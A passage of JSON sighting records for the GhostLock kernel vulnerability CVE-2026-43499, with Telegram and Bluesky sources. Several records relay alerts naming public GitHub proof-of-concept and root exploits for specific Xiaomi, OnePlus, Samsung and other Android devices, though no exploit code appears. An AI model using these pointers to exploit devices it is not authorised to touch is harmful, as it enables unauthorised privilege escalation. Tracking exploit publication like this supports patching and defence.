"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/lkTqxrRLFzmZiKWrqHB7ywSYEM6i5xRhtt_z45dAnhSWBug", "content": "", "creation_timestamp": "2026-07-16T19:00:04.181596Z"}, {"uuid": "438b2dbf-ec53-424e-aa99-b9f72de78b11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/6kr7hIoL88BrLchA92ncvvrRqf7Y35-wLyAsUuKqT9ornHo", "content": "", "creation_timestamp": "2026-07-16T19:00:06.491331Z"}, {"uuid": "d88134b5-baad-45c7-8bb0-f3edc8f85b1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/gEg0EOaWFFZnEfHhBHmpZpiTrHvldsjFXSF402VZoO1TzNg", "content": "", "creation_timestamp": "2026-07-16T19:00:06.654643Z"}, {"uuid": "a94633ba-6626-44e6-a295-89fe3d71b258", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/iYHsotoqlE8Z-AEKaQiVsXXSjTyl0MfV01akvHQ1zfYFYEI", "content": "", "creation_timestamp": "2026-07-16T19:00:07.187747Z"}, {"uuid": "fac1ab49-23f0-4296-b104-2a6a8a75288a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/iICdo6JkqLQcGiJzEUOva0XUBnrNpqjKkG8FagtyyTeeKdc", "content": "", "creation_timestamp": "2026-07-16T19:00:09.922931Z"}, {"uuid": "abbb03e5-6969-402e-8062-33e883e9e796", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/QcCULqR_90DoYHZQQv3lizl4V2L6hUeyHJg5WfJTRhJBtz0", "content": "", "creation_timestamp": "2026-07-16T19:00:10.467257Z"}, {"uuid": "e1353d30-7236-420d-a92b-1ac4ef2c687c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/tYmsElsn9h--aUiAjXnDcQx9kxldzvlWhq7A7UpXPwomXD0", "content": "", "creation_timestamp": "2026-07-16T19:00:10.986958Z"}, {"uuid": "2269da25-1116-4727-85ce-7ff94aea0708", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/7856q1VSKrM2rmaP9pUA3g7DeLjSvGX41DbCgkqetCbQx1c", "content": "", "creation_timestamp": "2026-07-16T19:00:10.578307Z"}, {"uuid": "00e99093-a9c3-480c-9081-b59747ccc78f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/Ptfoq-36JIr04842aRlYyiRH2eHGSh16yRBc9X59r84iQ6U", "content": "", "creation_timestamp": "2026-07-16T19:00:14.008475Z"}, {"uuid": "7d72d485-b059-4365-887a-e57e1f1dcb4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/vOHofO2qPvPXIyPNButd37pf6Fhua5DFTWTRaJatxt7pU5Q", "content": "", "creation_timestamp": "2026-07-16T19:00:08.529226Z"}, {"uuid": "d82b4d4d-ba24-4f75-a6c9-bc71064342db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/AsJtO6oP9l3H1kOcYxBEHOpAfkfZHY5OWvaOoNeuBwMm9sA", "content": "", "creation_timestamp": "2026-07-16T19:00:10.245050Z"}, {"uuid": "c72f674a-d1e7-44f6-acb3-ac56339d5c73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/uxGFUVPy3TOzkodNgeg8vepR-kYpq91Dg5jOn-NGrDlDjCc", "content": "", "creation_timestamp": "2026-07-16T19:00:16.062593Z"}, {"uuid": "b829d963-e5cc-4f99-89d1-7719caad0a28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/_qFyWwPBG5YYrYVJCuvS8pNkDyhJdlaykHNtl_KVjYImn64", "content": "", "creation_timestamp": "2026-07-16T19:00:16.903647Z"}, {"uuid": "cbabd30b-4f23-4f39-aeb2-039bdee87871", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/LBqrNkVY4dEwnjUy7Kq7g-cCM4l6IBHTiJls5F94h7vNHE8", "content": "", "creation_timestamp": "2026-07-16T19:00:30.195303Z"}, {"uuid": "9be430ad-7238-4cc9-b675-95ea9dcd865b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/mitstek.bsky.social/post/3mqscllray22o", "content": "GhostLock (CVE-2026-43499) kernel privilege escalation: Patch released | AlmaLinux OS\nalmalinux.org/blog/2026-07...", "creation_timestamp": "2026-07-16T22:41:18.297135Z"}, {"uuid": "99f4eb78-b85a-472c-912e-5ad9dc30ccbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "Telegram/7856q1VSKrM2rmaP9pUA3g7DeLjSvGX41DbCgkqetCbQx1c", "content": "", "creation_timestamp": "2026-07-17T00:00:07.544120Z"}, {"uuid": "790883d2-c08b-42ed-a86a-5cef93be1312", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "Telegram/AsJtO6oP9l3H1kOcYxBEHOpAfkfZHY5OWvaOoNeuBwMm9sA", "content": "", "creation_timestamp": "2026-07-17T00:00:07.752246Z"}, {"uuid": "6a7d8ea7-078e-48a8-b4f4-57e3ee6fc30a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "Telegram/QcCULqR_90DoYHZQQv3lizl4V2L6hUeyHJg5WfJTRhJBtz0", "content": "", "creation_timestamp": "2026-07-17T00:00:07.871349Z"}, {"uuid": "96a48ebc-0844-4d4f-9152-73bab6e02f1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "Telegram/iICdo6JkqLQcGiJzEUOva0XUBnrNpqjKkG8FagtyyTeeKdc", "content": "", "creation_timestamp": "2026-07-17T00:00:08.560111Z"}, {"uuid": "e7129406-3e92-48b4-872d-a16fc3688877", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "Telegram/vOHofO2qPvPXIyPNButd37pf6Fhua5DFTWTRaJatxt7pU5Q", "content": "", "creation_timestamp": "2026-07-17T00:00:09.274091Z"}, {"uuid": "c842d9a7-45e0-4c8a-95d6-d9cfc8351d3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "Telegram/6kr7hIoL88BrLchA92ncvvrRqf7Y35-wLyAsUuKqT9ornHo", "content": "", "creation_timestamp": "2026-07-17T00:00:25.283401Z"}, {"uuid": "37d90fcd-294c-481f-9490-d867b2415202", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/Ptfoq-36JIr04842aRlYyiRH2eHGSh16yRBc9X59r84iQ6U", "content": "", "creation_timestamp": "2026-07-17T00:00:30.297593Z"}, {"uuid": "ab10dce5-8cca-4be1-8692-ecf5fcf05657", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "Telegram/gEg0EOaWFFZnEfHhBHmpZpiTrHvldsjFXSF402VZoO1TzNg", "content": "", "creation_timestamp": "2026-07-17T00:00:11.482572Z"}, {"uuid": "b8187eb9-4974-4e6e-b4ab-0571a819cf8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "Telegram/lkTqxrRLFzmZiKWrqHB7ywSYEM6i5xRhtt_z45dAnhSWBug", "content": "", "creation_timestamp": "2026-07-17T00:00:26.387522Z"}, {"uuid": "497124bc-4bbb-4d33-a72d-c8b209909906", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/tYmsElsn9h--aUiAjXnDcQx9kxldzvlWhq7A7UpXPwomXD0", "content": "", "creation_timestamp": "2026-07-17T00:00:26.642339Z"}, {"uuid": "dcb83834-c7c4-4480-ac0d-260d43f04a08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/uxGFUVPy3TOzkodNgeg8vepR-kYpq91Dg5jOn-NGrDlDjCc", "content": "", "creation_timestamp": "2026-07-17T00:00:31.512298Z"}, {"uuid": "7885fe78-d275-4f0c-8407-ab1b6218c120", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/_qFyWwPBG5YYrYVJCuvS8pNkDyhJdlaykHNtl_KVjYImn64", "content": "", "creation_timestamp": "2026-07-17T00:00:32.329537Z"}, {"uuid": "3d5041d3-432e-4f48-a991-dc2c0e7f4986", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/LBqrNkVY4dEwnjUy7Kq7g-cCM4l6IBHTiJls5F94h7vNHE8", "content": "", "creation_timestamp": "2026-07-17T00:00:46.892053Z"}, {"uuid": "41658f0f-49b1-4d81-a903-4a9dc047ca61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93393", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43499-Poc-Analysis\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Linuxoid-cn\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-14 14:33:44\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nVulnerability analysis and Proof of Concept (PoC) for CVE-2026-43499 affecting Xiaomi devices. For educational and research purposes only.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-17T00:00:49.877976Z"}, {"uuid": "437b487e-6a62-4310-ae1e-4466645024d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93708", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a IonStack-CVE-2026-43499-jinghu\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ayyy7128\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-16 14:57:46\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-43499 exploit reproduction on jinghu (Xiaomi Pad 7 Ultra)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-17T00:00:49.965977Z"}, {"uuid": "3fb362ed-ddbc-4eb9-8ce7-1dde6104e8dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93720", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43499-jinghu\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ayyy7128\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 1\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-16 15:53:24\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-43499 exploit reproduction on jinghu (Xiaomi Pad 7 Ultra)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-17T00:00:49.278214Z"}, {"uuid": "d18817fc-1707-4357-8877-175256a04cf4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93424", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #Exploit #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a ghostlock\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a JoinChang\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 2  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-14 19:05:39\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nGhostLock (CVE-2026-43499) kernel exploit for OnePlus devices with locked bootloader\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-17T00:00:50.705628Z"}, {"uuid": "3388c8d4-37fe-4886-9c78-664ca4357e8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93455", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit #\u6f0f\u6d1e #\u5229\u7528\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Logitech-G-Cloud-GhostLock-CVE-2026-43499\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a HYCQAQ\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-15 02:28:28\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u7f57\u6280\u4e91\u638c\u673a \u00b7 GhostLock CVE-2026-43499 root \u5c1d\u8bd5\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-17T00:00:53.006050Z"}, {"uuid": "38272a5e-4c8e-464e-8c10-d8bfee71b1e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93428", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a ghostlock-oneplus\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a JoinChang\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 2  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-14 19:09:32\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nGhostLock (CVE-2026-43499) kernel exploit for OnePlus devices with locked bootloader\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-17T00:00:53.187214Z"}, {"uuid": "251371f6-be9e-4174-bef7-a1b6982beb94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93408", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #\u6f0f\u6d1e\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a oppo-A5-PRO-5G-CVE-2026-43499\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a qsvggff-spec\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 1  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-14 16:56:46\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u672c\u6b21\u4e2a\u4eba\u6f0f\u6d1e\u7814\u7a76\u8fdb\u5c55\u6210\u679c\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-17T00:00:52.834159Z"}, {"uuid": "08793650-70f9-4389-960e-02b8abf7865e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93468", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit #\u6f0f\u6d1e #\u5229\u7528\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a duchamp-root\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Colorful-glassblock\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-15 04:28:08\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nXiaomi K70e (duchamp) one-click root via CVE-2026-43499 (IonStack) + KernelSU integration\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-17T00:00:53.415079Z"}, {"uuid": "3c30258a-eb4d-45e5-9e5b-d776354999a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93520", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43499\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a onesmiledx\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-15 09:32:38\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nA modified method to root Android device with locked bootloader via new exploit. (Only for Samsung now or smthing like that devices cuz i ported it to N970U1), Fork of https://github.com/localhosts-A/CyberMeowfia\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-17T00:00:54.454855Z"}, {"uuid": "abeb15cf-5745-414f-84ed-6eac9ad6387f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93630", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a ghostlock-rothko\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a SlightNeko\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-16 02:51:33\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-43499 GhostLock exploit for Redmi K70 Ultra (rothko) - data-only physmap overwrite\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-17T00:00:55.269732Z"}, {"uuid": "3b8747f8-6ed9-41af-8a2e-3454f108e46f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93613", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #\u5229\u7528\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43499-popsicle\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a x-spy\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 154  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 42\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-15 22:47:05\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-43499 Implementation for 6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-17T00:00:55.393784Z"}, {"uuid": "66f9b01f-e4ad-40a4-8477-503d1ec8c532", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93634", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CyberMeowfia-ace3\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a DistrictBlauw\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-16 03:52:53\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-43499 exploit with OnePlus Ace3 support\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-17T00:00:55.491194Z"}, {"uuid": "8d51a5bc-93e9-47ae-ad6b-7fa6da4b39ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "Telegram/iYHsotoqlE8Z-AEKaQiVsXXSjTyl0MfV01akvHQ1zfYFYEI", "content": "", "creation_timestamp": "2026-07-17T01:00:07.341863Z"}, {"uuid": "c282889b-2057-4cf8-a371-e216317163f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/S_E_Reborn/6477", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u044f\u0434\u0440\u0435 Linux \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u0430\u0441\u044c \u0441\u043a\u0440\u044b\u0442\u043e\u0439 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u043e \u0432\u0441\u0435\u0445 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445 Linux \u0431\u043e\u043b\u0435\u0435 15 \u043b\u0435\u0442, 